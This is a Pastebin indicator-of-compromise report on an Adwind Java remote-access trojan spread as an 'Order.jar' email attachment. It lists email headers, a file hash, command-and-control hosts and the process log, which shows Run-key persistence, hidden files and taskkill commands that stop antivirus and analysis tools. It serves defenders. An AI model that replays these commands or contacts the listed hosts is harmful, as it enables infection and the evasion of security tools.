Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #Adwind #Java #JAR #JRE
- https://pastebin.com/BqbDN6Sr
- FAQ:
- https://radetskiy.wordpress.com/2018/05/11/ioc_adwind_100518/
- attack_vector
- --------------
- email attach .JAR > WSH > JRE > AppData\Roaming\*.jar + *.vbs
- email_headers
- --------------
- Received: from gunimo.com ([167.99.137.237])
- by srv8.victim1.com for <user0@org7.victim1.com>;
- Wed, 26 Dec 2018 12:24:21 +0200 (EET)
- (envelope-from tony.turner@stoneacre.co.uk)
- Received: from [102.165.33.14]
- by gunimo.com with esmtpsa (TLS1.0:DHE_RSA_AES_256_CBC_SHA1:256)
- (Exim 4.84_2) (envelope-from <tony.turner@stoneacre.co.uk>)
- id 1gZrOo-0001md-CS; Thu, 20 Dec 2018 06:01:44 +0000
- Subject: Order
- To: Recipients <tony.turner@stoneacre.co.uk>
- From: "Tony" <tony.turner@stoneacre.co.uk>
- files
- --------------
- SHA-256 b5cf1f4216841631e80ad31be8f623399d2a2c7057d3f7a062c9c7b2055eec11
- File name Order.jar
- File size 634.28 KB
- activity
- **************
- JAR > JRE > WSH > JRE > collect system info & open remote connection
- netwrk
- --------------
- 185.183.97.184 goz.unknowncrypter{.} com:7789 POST /is-ready HTTP/1.1
- AC38D1C7<|>APM11<|>operator<|>Microsoft Windows 7 ... <|>plus<|>nan-av<|>false - 26.12.2018
- comp
- --------------
- java.exe 2628 TCP 127.0.0.1 7777 SYN_SENT
- wscript.exe 2104 TCP 185.183.97.184 7789 ESTABLISHED
- javaw.exe 976 TCP 185.244.30.121 4379 SYN_SENT
- proc
- --------------
- "C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -jar "C:\Users\operator\Desktop\Order.jar"
- C:\Windows\system32\wscript.exe C:\Users\operator\ufcgwhauov.vbs
- "C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\dVvzehDtJK.vbs"
- C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -version 2> C:\tmp\output.txt
- "C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -version
- "C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -jar "C:\Users\operator\AppData\Roaming\ntfsmgr.jar"
- "C:\Program Files\Java\jre1.8.0_191\bin\java.exe" -jar C:\tmp\_0.90765668489300629104286604121415413.class
- C:\Windows\system32\cmd.exe
- C:\tmp\Retrive275305157297834866.vbs
- C:\tmp\Retrive3342971358066659593.vbs
- C:\tmp\Retrive5146022430127275435.vbs
- C:\tmp\Retrive118764366264415957.vbs
- C:\Windows\system32\xcopy.exe "C:\Program Files\Java\jre1.8.0_191" "C:\Users\operator\AppData\Roaming\Oracle\" /e
- C:\Windows\system32\reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v zaRukQhXbGj /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI\"" /f
- C:\Windows\system32\attrib.exe attrib +h "C:\Users\operator\TpTuKAZzLlb\*.*"
- C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI
- C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe -jar C:\tmp\_0.58402873485980682215056483974766042.class
- C:\Windows\system32\cmd.exe
- C:\tmp\Retrive3841406484415973045.vbs
- C:\tmp\Retrive4727136555263513640.vbs
- C:\tmp\Retrive7570843625298647226.vbs
- C:\tmp\Retrive8366581331663954177.vbs
- C:\Windows\system32\taskkill.exe /IM ProcessHacker.exe /T /F
- C:\Windows\system32\cmd.exe /c regedit.exe /s C:\tmp\CEBqbLoDPx3000572971971620291.reg
- C:\Windows\system32\taskkill.exe
- taskkill /IM MSASCui.exe /T /F
- taskkill /IM MsMpEng.exe /T /F
- taskkill /IM MpUXSrv.exe /T /F
- taskkill /IM MpCmdRun.exe /T /F
- taskkill /IM NisSrv.exe /T /F
- taskkill /IM ConfigSecurityPolicy.exe /T /F
- taskkill /IM procexp.exe /T /F
- taskkill /IM wireshark.exe /T /F
- ...
- taskkill /IM FortiClient_Diagnostic_Tool.exe /T /F
- taskkill /IM twsscan.exe /T /F
- taskkill /IM UserReg.exe /T /F
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 26.12.2018 17:38
- @dVvzehDtJK
- c:\users\operator\appdata\roaming\dvvzehdtjk.vbs 26.12.2018 17:38
- wscript.exe //B "C:\Users\operator\AppData\Roaming\dVvzehDtJK.vbs"
- @ntfsmgr Java(TM) Platform SE binary Oracle Corporation
- c:\program files\java\jre1.8.0_191\bin\javaw.exe 06.10.2018 18:42
- "C:\Program Files\Java\jre1.8.0_191\bin\javaw.exe" -jar "C:\Users\operator\AppData\Roaming\ntfsmgr.jar"
- @zaRukQhXbGj Java(TM) Platform SE binary Oracle Corporation
- c:\users\operator\appdata\roaming\oracle\bin\javaw.exe 06.10.2018 18:42
- "C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar "C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI"
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 26.12.2018 17:38
- @dVvzehDtJK.vbs
- c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\dvvzehdtjk.vbs 26.12.2018 17:38
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dVvzehDtJK.vbs
- drop
- --------------
- C:\Users\operator\ufcgwhauov.vbs
- C:\Users\operator\AppData\Roaming\dVvzehDtJK.vbs
- C:\tmp\output.txt
- C:\Users\operator\AppData\Roaming\ntfsmgr.jar
- C:\tmp\_0.90765668489300629104286604121415413.class
- C:\tmp\Retrive275305157297834866.
- C:\tmp\Retrive3342971358066659593.vbs
- C:\tmp\Retrive5146022430127275435.vbs
- C:\tmp\Retrive118764366264415957.vbs
- C:\Users\operator\AppData\Roaming\Oracle\
- C:\Users\operator\TpTuKAZzLlb\
- C:\Users\operator\TpTuKAZzLlb\SjzfHALFGLg.uJjalI
- C:\Users\operator\fUTkALeaTxM\
- C:\tmp\_0.58402873485980682215056483974766042.class
- C:\tmp\Retrive3841406484415973045.vbs
- C:\tmp\Retrive4727136555263513640.vbs
- C:\tmp\Retrive7570843625298647226.vbs
- C:\tmp\Retrive8366581331663954177.vbs
- C:\tmp\CEBqbLoDPx3000572971971620291.reg
- VR
- # # #
- https://www.virustotal.com/#/file/b5cf1f4216841631e80ad31be8f623399d2a2c7057d3f7a062c9c7b2055eec11/details
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement